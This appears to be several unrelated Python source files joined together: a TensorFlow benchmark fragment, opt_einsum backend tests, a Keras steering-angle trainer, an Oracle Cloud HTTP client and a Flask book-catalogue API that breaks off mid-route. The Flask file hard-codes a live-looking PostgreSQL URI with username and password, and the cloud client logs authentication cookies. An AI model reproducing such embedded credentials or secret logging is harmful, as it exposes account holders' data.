mlperf.logger.log(key=mlperf.tags.MODEL_L2_REGULARIZATION, value=weight_decay) total_loss += len(self.devices) * weight_decay * l2_loss aggmeth = tf.AggregationMethod.DEFAULT scaled_loss = (total_loss if self.loss_scale is None else total_loss * self.loss_scale) grads = tf.gradients(scaled_loss, params, aggregation_method=aggmeth) if self.params.sparse_to_dense_grads: # Passing a sparse gradient to convert_to_tensor turns it into a dense # gradient. A sparse gradient is an instance of tf.IndexedSlices. # convert_to_tensor does not modify dense tensors. grads = [tf.convert_to_tensor(g) for g in grads] if self.loss_scale is not None: # TODO(reedwm): If automatic loss scaling is not used, we could avoid # these multiplications by directly modifying the learning rate instead. # If this is done, care must be taken to ensure that this scaling method # is correct, as some optimizers square gradients and do other # operations which might not be compatible with modifying both the # gradients and the learning rate. grads = [ grad * tf.cast(1. / self.loss_scale, grad.dtype) for grad in grads ] if self.params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top if self.params.horovod_device: horovod_device = '/%s:0' % self.params.horovod_device else: horovod_device = '' # All-reduce gradients using Horovod. grads = [hvd.allreduce(grad, average=False, device_dense=horovod_device) for grad in grads] if self.params.staged_vars: grad_dtypes = [grad.dtype for grad in grads] grad_shapes = [grad.shape for grad in grads] grad_stage = data_flow_ops.StagingArea(grad_dtypes, grad_shapes) grad_stage_op = grad_stage.put(grads) # In general, this decouples the computation of the gradients and # the updates of the weights. # During the pipeline warm up, this runs enough training to produce # the first set of gradients. gpu_grad_stage_ops.append(grad_stage_op) grads = grad_stage.get() if self.params.loss_type_to_report == 'total_loss': loss = total_loss else: loss = base_loss if self.params.print_training_accuracy: return [logits, loss] + grads else: return [loss] + grads def unpack_forward_pass_and_gradients_output(forward_pass_and_grad_outputs): """Unpacks outputs from forward_pass_and_gradients. Args: forward_pass_and_grad_outputs: Output from forward_pass_and_gradients. Returns: logits: Unscaled probability distribution from forward pass. If unavailable, None is returned. loss: Loss function result from logits. If unavailable, None is returned. grads: Gradients for all trainable variables. If unavailable, None is returned. """ logits = None # logits is only fetched in non-train mode or when # print_training_accuracy is set. if not phase_train or self.params.print_training_accuracy: logits = forward_pass_and_grad_outputs.pop(0) loss = ( forward_pass_and_grad_outputs[0] if forward_pass_and_grad_outputs else None) grads = ( forward_pass_and_grad_outputs[1:] if forward_pass_and_grad_outputs else None) return logits, loss, grads def make_results(logits, loss, grads): """Generate results based on logits, loss and grads.""" results = {} # The return value if logits is not None: results['logits'] = logits accuracy_ops = self.model.accuracy_function(input_list, logits) for name, op in accuracy_ops.items(): results['accuracy:' + name] = op if loss is not None: results['loss'] = loss if grads is not None: param_refs = self.variable_mgr.trainable_variables_on_device( rel_device_num, abs_device_num, writable=True) results['gradvars'] = list(zip(grads, param_refs)) return results with tf.device(self.devices[rel_device_num]): outputs = maybe_compile(forward_pass_and_gradients, self.params) logits, loss, grads = unpack_forward_pass_and_gradients_output(outputs) return make_results(logits, loss, grads) def get_input_preprocessor(self): """Returns the image preprocessor to used, based on the model. Returns: The image preprocessor, or None if synthetic data should be used. """ shift_ratio = 0 if self.job_name: # shift_ratio prevents multiple workers from processing the same batch # during a step shift_ratio = self.task_index / self.num_workers processor_class = self.dataset.get_input_preprocessor( self.params.input_preprocessor) assert processor_class subset = 'validation' if self._doing_eval else 'train' return processor_class( self.batch_size * self.batch_group_size, self.model.get_input_shapes(subset), len(self.devices) * self.batch_group_size, dtype=self.model.data_type, train=(not self._doing_eval), # TODO(laigd): refactor away image model specific parameters. distortions=self.params.distortions, resize_method=self.resize_method, shift_ratio=shift_ratio, summary_verbosity=self.params.summary_verbosity, distort_color_in_yiq=self.params.distort_color_in_yiq, fuse_decode_and_crop=self.params.fuse_decode_and_crop, match_mlperf=self.params.ml_perf) def add_sync_queues_and_barrier(self, name_prefix, enqueue_after_list): """Adds ops to enqueue on all worker queues. Args: name_prefix: prefixed for the shared_name of ops. enqueue_after_list: control dependency from ops. Returns: An op that should be used as control dependency before starting next step. """ self.sync_queue_counter += 1 with tf.device(self.sync_queue_devices[( self.sync_queue_counter % len(self.sync_queue_devices))]): sync_queues = [ tf.FIFOQueue(self.num_workers, [tf.bool], shapes=[[]], shared_name='%s%s' % (name_prefix, i)) for i in range(self.num_workers)] queue_ops = [] # For each other worker, add an entry in a queue, signaling that it can # finish this step. token = tf.constant(False) with tf.control_dependencies(enqueue_after_list): for i, q in enumerate(sync_queues): if i == self.task_index: queue_ops.append(tf.no_op()) else: queue_ops.append(q.enqueue(token)) # Drain tokens off queue for this worker, one for each other worker. queue_ops.append( sync_queues[self.task_index].dequeue_many(len(sync_queues) - 1)) return tf.group(*queue_ops) def _is_mkl_flag_absent(mkl_flag): return not (absl_flags.FLAGS.is_parsed() and mkl_flag in absl_flags.FLAGS and absl_flags.FLAGS[mkl_flag].present) def _print_os_env_ignored_warning(mkl_flag, flag_default_val, os_env_var): tf.logging.warn( ('OS ENV variable %s=%s is ignored and script default: ' '%s is used. Use --%s to override.') % (os_env_var, os.environ[os_env_var], flag_default_val, mkl_flag)) def _set_environ_vars(params): """Sets up the environment variables that BenchmarkCNN should use.""" if params.batchnorm_persistent: os.environ['TF_USE_CUDNN_BATCHNORM_SPATIAL_PERSISTENT'] = '1' else: os.environ.pop('TF_USE_CUDNN_BATCHNORM_SPATIAL_PERSISTENT', None) if params.winograd_nonfused: os.environ['TF_ENABLE_WINOGRAD_NONFUSED'] = '1' else: os.environ.pop('TF_ENABLE_WINOGRAD_NONFUSED', None) if params.autotune_threshold: os.environ['TF_AUTOTUNE_THRESHOLD'] = str(params.autotune_threshold) os.environ['TF_SYNC_ON_FINISH'] = str(int(params.sync_on_finish)) argparse.ArgumentParser( formatter_class=argparse.ArgumentDefaultsHelpFormatter) # Sets environment variables for MKL # If OS ENV vars are overridden by script defaults, a warning msg is printed. if params.mkl: mkl_flags = ['kmp_blocktime', 'kmp_settings', 'kmp_affinity', 'num_intra_threads'] for mkl_flag in mkl_flags: os_env_var = mkl_flag.upper() if mkl_flag == 'num_intra_threads': os_env_var = 'OMP_NUM_THREADS' flag_val = str(getattr(params, mkl_flag)) if _is_mkl_flag_absent(mkl_flag) and os_env_var in os.environ: _print_os_env_ignored_warning(mkl_flag, flag_val, os_env_var) os.environ[os_env_var] = flag_val if mkl_flag == 'num_intra_threads' and not params.num_intra_threads: os.environ.pop(os_env_var, None) # Sets GPU thread settings if params.device.lower() == 'gpu': params = params._replace(gpu_thread_mode=params.gpu_thread_mode.lower()) if params.gpu_thread_mode not in ['global', 'gpu_shared', 'gpu_private']: raise ValueError('Invalid gpu_thread_mode: %s' % params.gpu_thread_mode) os.environ['TF_GPU_THREAD_MODE'] = params.gpu_thread_mode if params.per_gpu_thread_count and params.gpu_thread_mode == 'global': raise ValueError( 'Invalid per_gpu_thread_count with gpu_thread_mode=global: %s' % params.per_gpu_thread_count) # Default to two threads. One for the device compute and the other for # memory copies. per_gpu_thread_count = params.per_gpu_thread_count or 2 total_gpu_thread_count = per_gpu_thread_count * params.num_gpus if params.gpu_thread_mode == 'gpu_private': os.environ['TF_GPU_THREAD_COUNT'] = str(per_gpu_thread_count) elif params.gpu_thread_mode == 'gpu_shared': os.environ['TF_GPU_THREAD_COUNT'] = str(total_gpu_thread_count) cpu_count = multiprocessing.cpu_count() if not params.num_inter_threads and params.gpu_thread_mode in [ 'gpu_private', 'gpu_shared' ]: main_thread_count = max(cpu_count - total_gpu_thread_count, 1) params = params._replace(num_inter_threads=main_thread_count) if (params.datasets_use_prefetch and params.datasets_num_private_threads is None): # From the total cpu thread count, subtract the total_gpu_thread_count, # and then 2 threads per GPU device for event monitoring and sending / # receiving tensors num_monitoring_threads = 2 * params.num_gpus num_private_threads = max( cpu_count - total_gpu_thread_count - num_monitoring_threads, 1) params = params._replace(datasets_num_private_threads=num_private_threads) return params def setup(params): """Sets up the environment that BenchmarkCNN should run in. Args: params: Params tuple, typically created by make_params or make_params_from_flags. Returns: A potentially modified params. Raises: ValueError: invalid parames combinations. """ # Set up environment variables before doing any other global initialization to # make sure it uses the appropriate environment variables. params = _set_environ_vars(params) # horovod needs to be initialized before create_config_proto() call since # it will be used in config generation if enabled. if params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top hvd.init() platforms_util.initialize(params, create_config_proto(params)) if not params.job_name: # Create a dummy session to initialize TF global variables using the input # params. Otherwise, ListDevices function may create global devices using # the default config instead of using the user provided config. # # TODO(hinsu): Find a way to achieve the same for distributed benchmark. It # is not legal to create distributed session after local session. It is also # not possible to create distributed session here as that results in # multiple creation of ClusterManager and Server. with tf.Session(config=create_config_proto(params)) as sess: del sess return params def maybe_compile(computation, params): if params and params.xla_compile: return xla.compile(computation) else: return computation()
import numpy as np import pytest from opt_einsum import (backends, contract, contract_expression, helpers, sharing) from opt_einsum.contract import Shaped, infer_backend, parse_backend try: import cupy found_cupy = True except ImportError: found_cupy = False try: import tensorflow as tf # needed so tensorflow doesn't allocate all gpu mem _TF_CONFIG = tf.ConfigProto() _TF_CONFIG.gpu_options.allow_growth = True found_tensorflow = True except ImportError: found_tensorflow = False try: import os os.environ['MKL_THREADING_LAYER'] = 'GNU' import theano found_theano = True except ImportError: found_theano = False try: import torch found_torch = True except ImportError: found_torch = False try: import jax found_jax = True except ImportError: found_jax = False try: import autograd found_autograd = True except ImportError: found_autograd = False tests = [ 'ab,bc->ca', 'abc,bcd,dea', 'abc,def->fedcba', 'abc,bcd,df->fa', # test 'prefer einsum' ops 'ijk,ikj', 'i,j->ij', 'ijk,k->ij', 'AB,BC->CA', ] @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("string", tests) def test_tensorflow(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) opt = np.empty_like(ein) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) sess = tf.Session(config=_TF_CONFIG) with sess.as_default(): expr(*views, backend='tensorflow', out=opt) sess.close() assert np.allclose(ein, opt) # test non-conversion mode tensorflow_views = [backends.to_tensorflow(view) for view in views] expr(*tensorflow_views) @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_tensorflow_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check tensorflow with tf.Session(config=_TF_CONFIG).as_default(): res_got = expr(var, backend='tensorflow') assert all(array is None or infer_backend(array) == 'tensorflow' for array in expr._evaluated_constants['tensorflow']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check tensorflow call returns tensorflow still res_got3 = expr(backends.to_tensorflow(var)) assert isinstance(res_got3, tf.Tensor) @pytest.mark.skipif(not found_tensorflow, reason="Tensorflow not installed.") @pytest.mark.parametrize("string", tests) def test_tensorflow_with_sharing(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) sess = tf.Session(config=_TF_CONFIG) with sess.as_default(), sharing.shared_intermediates() as cache: tfl1 = expr(*views, backend='tensorflow') assert sharing.get_sharing_cache() is cache cache_sz = len(cache) assert cache_sz > 0 tfl2 = expr(*views, backend='tensorflow') assert len(cache) == cache_sz assert all(isinstance(t, tf.Tensor) for t in cache.values()) assert np.allclose(ein, tfl1) assert np.allclose(ein, tfl2) @pytest.mark.skipif(not found_theano, reason="Theano not installed.") @pytest.mark.parametrize("string", tests) def test_theano(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='theano') assert np.allclose(ein, opt) # test non-conversion mode theano_views = [backends.to_theano(view) for view in views] theano_opt = expr(*theano_views) assert isinstance(theano_opt, theano.tensor.TensorVariable) @pytest.mark.skipif(not found_theano, reason="theano not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_theano_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check theano res_got = expr(var, backend='theano') assert all(array is None or infer_backend(array) == 'theano' for array in expr._evaluated_constants['theano']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check theano call returns theano still res_got3 = expr(backends.to_theano(var)) assert isinstance(res_got3, theano.tensor.TensorVariable) @pytest.mark.skipif(not found_theano, reason="Theano not installed.") @pytest.mark.parametrize("string", tests) def test_theano_with_sharing(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) with sharing.shared_intermediates() as cache: thn1 = expr(*views, backend='theano') assert sharing.get_sharing_cache() is cache cache_sz = len(cache) assert cache_sz > 0 thn2 = expr(*views, backend='theano') assert len(cache) == cache_sz assert all(isinstance(t, theano.tensor.TensorVariable) for t in cache.values()) assert np.allclose(ein, thn1) assert np.allclose(ein, thn2) @pytest.mark.skipif(not found_cupy, reason="Cupy not installed.") @pytest.mark.parametrize("string", tests) def test_cupy(string): # pragma: no cover views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='cupy') assert np.allclose(ein, opt) # test non-conversion mode cupy_views = [backends.to_cupy(view) for view in views] cupy_opt = expr(*cupy_views) assert isinstance(cupy_opt, cupy.ndarray) assert np.allclose(ein, cupy.asnumpy(cupy_opt)) @pytest.mark.skipif(not found_cupy, reason="Cupy not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_cupy_with_constants(constants): # pragma: no cover eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check cupy res_got = expr(var, backend='cupy') # check cupy versions of constants exist assert all(array is None or infer_backend(array) == 'cupy' for array in expr._evaluated_constants['cupy']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check cupy call returns cupy still res_got3 = expr(cupy.asarray(var)) assert isinstance(res_got3, cupy.ndarray) assert np.allclose(res_exp, res_got3.get()) @pytest.mark.skipif(not found_jax, reason="jax not installed.") @pytest.mark.parametrize("string", tests) def test_jax(string): # pragma: no cover views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='jax') assert np.allclose(ein, opt) assert isinstance(opt, np.ndarray) @pytest.mark.skipif(not found_jax, reason="jax not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_jax_with_constants(constants): # pragma: no cover eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check jax res_got = expr(var, backend='jax') # check jax versions of constants exist assert all(array is None or infer_backend(array) == 'jax' for array in expr._evaluated_constants['jax']) assert np.allclose(res_exp, res_got) @pytest.mark.skipif(not found_jax, reason="jax not installed.") def test_jax_jit_gradient(): eq = 'ij,jk,kl->' shapes = (2, 3), (3, 4), (4, 2) views = [np.random.randn(*s) for s in shapes] expr = contract_expression(eq, *shapes) x0 = expr(*views) jit_expr = jax.jit(expr) x1 = jit_expr(*views).item() assert x1 == pytest.approx(x0, rel=1e-5) # jax only takes gradient w.r.t first argument grad_expr = jax.jit(jax.grad(lambda views: expr(*views))) view_grads = grad_expr(views) assert all(v1.shape == v2.shape for v1, v2 in zip(views, view_grads)) # taking a step along the gradient should reduce our 'loss' new_views = [v - 0.001 * dv for v, dv in zip(views, view_grads)] x2 = jit_expr(*new_views).item() assert x2 < x1 @pytest.mark.skipif(not found_autograd, reason="autograd not installed.") def test_autograd_gradient(): eq = 'ij,jk,kl->' shapes = (2, 3), (3, 4), (4, 2) views = [np.random.randn(*s) for s in shapes] expr = contract_expression(eq, *shapes) x0 = expr(*views) # autograd only takes gradient w.r.t first argument grad_expr = autograd.grad(lambda views: expr(*views)) view_grads = grad_expr(views) assert all(v1.shape == v2.shape for v1, v2 in zip(views, view_grads)) # taking a step along the gradient should reduce our 'loss' new_views = [v - 0.001 * dv for v, dv in zip(views, view_grads)] x1 = expr(*new_views) assert x1 < x0 @pytest.mark.parametrize("string", tests) def test_dask(string): da = pytest.importorskip("dask.array") views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) # test non-conversion mode da_views = [da.from_array(x, chunks=(2)) for x in views] da_opt = expr(*da_views) # check type is maintained when not using numpy arrays assert isinstance(da_opt, da.Array) assert np.allclose(ein, np.array(da_opt)) # try raw contract da_opt = contract(string, *da_views) assert isinstance(da_opt, da.Array) assert np.allclose(ein, np.array(da_opt)) @pytest.mark.parametrize("string", tests) def test_sparse(string): sparse = pytest.importorskip("sparse") views = helpers.build_views(string) # sparsify views so they don't become dense during contraction for view in views: np.random.seed(42) mask = np.random.choice([False, True], view.shape, True, [0.05, 0.95]) view[mask] = 0 ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) # test non-conversion mode sparse_views = [sparse.COO.from_numpy(x) for x in views] sparse_opt = expr(*sparse_views) # check type is maintained when not using numpy arrays assert isinstance(sparse_opt, sparse.COO) assert np.allclose(ein, sparse_opt.todense()) # try raw contract sparse_opt = contract(string, *sparse_views) assert isinstance(sparse_opt, sparse.COO) assert np.allclose(ein, sparse_opt.todense()) @pytest.mark.skipif(not found_torch, reason="Torch not installed.") @pytest.mark.parametrize("string", tests) def test_torch(string): views = helpers.build_views(string) ein = contract(string, *views, optimize=False, use_blas=False) shps = [v.shape for v in views] expr = contract_expression(string, *shps, optimize=True) opt = expr(*views, backend='torch') assert np.allclose(ein, opt) # test non-conversion mode torch_views = [backends.to_torch(view) for view in views] torch_opt = expr(*torch_views) assert isinstance(torch_opt, torch.Tensor) assert np.allclose(ein, torch_opt.cpu().numpy()) @pytest.mark.skipif(not found_torch, reason="Torch not installed.") @pytest.mark.parametrize("constants", [{0, 1}, {0, 2}, {1, 2}]) def test_torch_with_constants(constants): eq = 'ij,jk,kl->li' shapes = (2, 3), (3, 4), (4, 5) non_const, = {0, 1, 2} - constants ops = [np.random.rand(*shp) if i in constants else shp for i, shp in enumerate(shapes)] var = np.random.rand(*shapes[non_const]) res_exp = contract(eq, *(ops[i] if i in constants else var for i in range(3))) expr = contract_expression(eq, *ops, constants=constants) # check torch res_got = expr(var, backend='torch') assert all(array is None or infer_backend(array) == 'torch' for array in expr._evaluated_constants['torch']) assert np.allclose(res_exp, res_got) # check can call with numpy still res_got2 = expr(var, backend='numpy') assert np.allclose(res_exp, res_got2) # check torch call returns torch still res_got3 = expr(backends.to_torch(var)) assert isinstance(res_got3, torch.Tensor) res_got3 = res_got3.numpy() if res_got3.device.type == 'cpu' else res_got3.cpu().numpy() assert np.allclose(res_exp, res_got3) def test_auto_backend_custom_array_no_tensordot(): x = Shaped((1, 2, 3)) # Shaped is an array-like object defined by opt_einsum - which has no TDOT assert infer_backend(x) == 'opt_einsum' assert parse_backend([x], 'auto') == 'numpy'
import csv from training import constants import numpy as np import cv2 from keras.models import Model, Sequential from keras.layers import Dense, Flatten, Conv2D, Lambda, Cropping2D, MaxPool2D, Dropout from keras.callbacks import EarlyStopping def read_training_data(file, mirror_input=True, multicam=True): images = [] steering_angles = [] with open(file) as csvfile: csvreader = csv.reader(csvfile, delimiter=',') for row in csvreader: row_images = [] row_steering_angles = [] # create adjusted steering measurements for the side camera images steer_correction = 0.2 # this is a parameter to tune row_images.append(cv2.imread(row[constants.IMAGE_CENTER])) row_steering_angles.append(float(row[constants.STEERING_ANGLE])) if multicam: row_images.append(cv2.imread(row[constants.IMAGE_LEFT])) row_images.append(cv2.imread(row[constants.IMAGE_RIGHT])) row_steering_angles.append( float(row[constants.STEERING_ANGLE]) + steer_correction) row_steering_angles.append( float(row[constants.STEERING_ANGLE]) - steer_correction) if mirror_input: mirrored_row_images, mirrored_row_steering_angles = mirror( row_images, row_steering_angles) row_images.extend(mirrored_row_images) row_steering_angles.extend(mirrored_row_steering_angles) images.extend(row_images) steering_angles.extend(row_steering_angles) return np.array(images), np.array(steering_angles) def mirror(images, steering_angles): return list(map(lambda image: cv2.flip(image, 1), images)), list(map(lambda angle: -angle, steering_angles)) def crop(image, top=64, bottom=20, left=0, right=0): height = image.shape[0] width = image.shape[1] return image[top:(height - bottom), left:(width - right)] def train(X_train, y_train, keep_prob=0.8): dropout_rate = 1.0 - keep_prob model = Sequential() model.add(Cropping2D(((40, 20), (0, 0)), input_shape=(160, 320, 3))) model.add(Lambda(lambda x: (x - 128) / 255)) model.add(Conv2D(24, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(36, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(48, (5, 5), activation='relu', strides=(2, 2))) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(64, (3, 3), activation='relu')) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Conv2D(64, (3, 3), activation='relu')) # model.add(MaxPool2D((2, 2), (1, 1))) model.add(Dropout(rate=dropout_rate)) model.add(Flatten()) model.add(Dense(100)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(50)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(10)) model.add(Dropout(rate=dropout_rate)) model.add(Dense(1)) model.compile(loss='mse', optimizer='adam') model.fit(X_train, y_train, validation_split=0.2, epochs=20, shuffle=True, callbacks=[EarlyStopping(patience=8)]) return model X_train, y_train = read_training_data('./training/driving_log.csv') model = train(X_train, y_train) model.save('model.h5')
# -*- coding: utf-8 -*- """ #@Filename : requests_client #@Date : [7/30/2018 1:51 PM] #@Poject: gc3-query #@AUTHOR : emharris ~~~~~~~~~~~~~~~~ <DESCR SHORT> <DESCR> """ ################################################################################ ## Standard Library Imports ################################################################################ ## Third-Party Imports from urllib.parse import unquote_plus from bravado.requests_client import RequestsClient, BasicAuthenticator from requests.auth import HTTPBasicAuth from requests.auth import _basic_auth_str ################################################################################ ## Project Imports from gc3_query.lib import * from gc3_query.lib import gc3_cfg from gc3_query.lib import get_logging _debug, _info, _warning, _error, _critical = get_logging(name=__name__) class IaaSRequestsHTTPBasicAuth(HTTPBasicAuth): def __init__(self, username, password): super().__init__(username, password) def __call__(self, r): r.headers['Authorization'] = _basic_auth_str(self.username, self.password) return r class IaaSRequestsBasicAuthenticator(BasicAuthenticator): def __init__(self, host, username, password): super().__init__(host, username, password) def __call__(self, *args, **kwargs): pass class IaaSRequestsHTTPClient(RequestsClient): """Synchronous HTTP client implementation with tweaks for Oracle Cloud. """ def __init__(self, idm_cfg: Dict[str, Any], skip_authentication: bool = False): super().__init__() self.idm_cfg = idm_cfg self.skip_authentication = skip_authentication self.idm_domain_name = self.idm_cfg.name self.rest_endpoint: str = self.idm_cfg.rest_endpoint # self.headers = {'Content-Type': 'application/oracle-compute-v3+json', # 'Accept': 'application/oracle-compute-v3+json, json, text/html', # } # self.session.headers['Content-Type'] = 'application/oracle-compute-v3+json' if gc3_cfg.user.use_proxy: _info(f"gc3_cfg.user.use_proxy={gc3_cfg.user.use_proxy}, configuring proxy.") self.proxies = {'http': gc3_cfg.network.http_proxy, 'https': gc3_cfg.network.https_proxy} self.session.proxies.update(self.proxies) else: _info(f"gc3_cfg.user.use_proxy={gc3_cfg.user.use_proxy}, not configuring proxy.") self.proxies = None _debug(f"rest_endpoint={self.rest_endpoint}") _debug(f"proxies={self.proxies}") _debug(f"idm_cfg={self.idm_cfg}") # _debug(f"headers={self.headers}") if self.skip_authentication: _warning(f"skip_authentication={self.skip_authentication}, authentication disabled.") self.auth_cookie_header = None else: self.auth_cookie_header = self.authenticate() # self.session.headers.update(self.auth_cookie_header) _debug(f"self.session.headers={self.session.headers}") @property def authenticated(self): return 'nimbula' in self.session.cookies def authenticate(self) -> dict: auth_url = f"{self.rest_endpoint}/authenticate/" idm_cred = gc3_cfg.get_credential(idm_domain_name=self.idm_cfg.name) # BULLSHIT, this doesn't work! If you are using a traditional cloud account or if your account creation email contains information about the identity domain as shown in the following example, # then you must use the following format for the two-part user name: # /Compute-identityDomainName/username # # If you are using a cloud account with Identity Cloud Service (IDCS) or if your account creation email does not contain information about the identity domain, # then you must use the following format for the two-part user name: # /Compute-serviceInstanceID/username # json_data = {"user": f"/Compute-{self.idm_cfg.service_instance_id}/{idm_cred.username}", "password": idm_cred.password} user = f"/{self.idm_cfg.formal_name}/{idm_cred.username}" json_data = {"user": user, "password": idm_cred.password} # json_data = {"user": f"/Compute-{self.idm_cfg.name}/{idm_cred.username}", "password": idm_cred.password} response = self.session.post(url=auth_url, json=json_data) if response.ok: _info(f'Response OK: {response.ok}, Status Code: {response.status_code}, URL: {response.url}') else: _debug(f"Failed to authenticate user: auth_url={auth_url}, self.idm_cfg={self.idm_cfg}") _error(f'Response OK: {response.ok}, Status Code: {response.status_code}, URL: {response.url}') raise RuntimeError(f"Failed to authenticate user: auth_url={auth_url}, self.idm_cfg={self.idm_cfg}") cookie_header = {'Cookie': response.headers['Set-Cookie']} _debug(f"cookie_header={cookie_header}") # TODO: enable this # del(idm_cred) # del(json_data) # del(response) return cookie_header @staticmethod def separate_params(request_params: DictStrAny) -> Tuple[DictStrAny, DictStrAny]: """Splits the passed in dict of request_params into two buckets, and Replace %xx escapes in the URL by their single-character equivalent. - sanitized_params are valid kwargs for constructing a requests.Request(..) - misc_options are things like timeouts which can't be communicated to the Requests library via the requests.Request(...) constructor. :param request_params: kitchen sink of request params. Treated as a read-only dict. :returns: tuple(sanitized_params, misc_options) """ _debug(f"input request_params={request_params}") sanitized_params: Dict[str, Any] misc_options: Dict[str, Any] sanitized_params, misc_options = RequestsClient.separate_params(request_params=request_params) _debug(f"From RequestsClient baseclass: sanitized_params={sanitized_params}, misc_options={misc_options}") unquoted_url = unquote_plus(sanitized_params['url']) _debug(f"unquoted_url={unquoted_url}") sanitized_params['url'] = unquoted_url return sanitized_params, misc_options
from distutils.log import error from enum import unique import os from flask_migrate import Migrate from flask import Flask, jsonify, redirect, render_template, request, url_for, abort from flask_sqlalchemy import SQLAlchemy from dotenv import load_dotenv from urllib.parse import quote_plus load_dotenv() app = Flask(__name__) motdepasse=("motdepasse") motdepasse = quote_plus(os.getenv('pswd_db')) app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://yqoameeujwohws:bac0c500849bdd021f07a7c3fd7340220da1531b7733405d6eb5ea4214db1e61@ec2-52-44-50-220.compute-1.amazonaws.com:5432/devu6ihe8a91si" #app.config['SQLALCHEMY_DATABASE_URI'] = "postgresql://postgres:{}@localhost:5432/Biblio".format(motdepasse) app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False db=SQLAlchemy(app) migrate = Migrate(app,db) #Creation des tables Catégorie et Livre class Categorie(db.Model): __tablename__ = 'categories' categorie_id = db.Column(db.Integer, primary_key=True) libelle = db.Column(db.String(150), nullable=False) valeur = db.relationship ("Livre",backref = "categories",lazy=True ) def __init__(self,libelle): self.libelle = libelle def insert(self): db.session.add(self) db.session.commit() def delete(self): db.session.delete(self) db.session.commit() def update(self): db.session.commit() def format(self): return { 'id_categorie': self.categorie_id, 'libelle_categorie' : self.libelle } class Livre(db.Model): __tablename__ = 'livres' id = db.Column(db.Integer, primary_key=True) isbn = db.Column(db.String(12), nullable=False) titre = db.Column(db.String(150), nullable=False) date_publication = db.Column(db.Date, nullable=False) auteur = db.Column(db.String(150), nullable=False) editeur = db.Column(db.String(150), nullable=False) categorie_id = db.Column(db.Integer,db.ForeignKey('categories.categorie_id'),nullable=False) def __init__(self,isbn,titre, date_publication,auteur,editeur,categorie_id): self.isbn = isbn self.titre = titre self.date_publication = date_publication self.auteur = auteur self.editeur = editeur self.categorie_id = categorie_id def insert(self): db.session.add(self) db.session.commit() def delete(self): db.session.delete(self) db.session.commit() def update(self): db.session.commit() def format(self): return { 'id' : self.id, 'isbn' : self.isbn, 'titre' : self.titre, 'date_publication' : self.date_publication, 'auteur' : self.auteur, 'editeur' : self.editeur, 'categorie_id': self.categorie_id } db.create_all() def paginate(request): items = [item.format() for item in request] return items ############################## # Lister tous les livres + ############################## @app.route('/livres') def get_livres(): try: livres = Livre.query.all() livres = paginate(livres) return jsonify({ 'success': True, 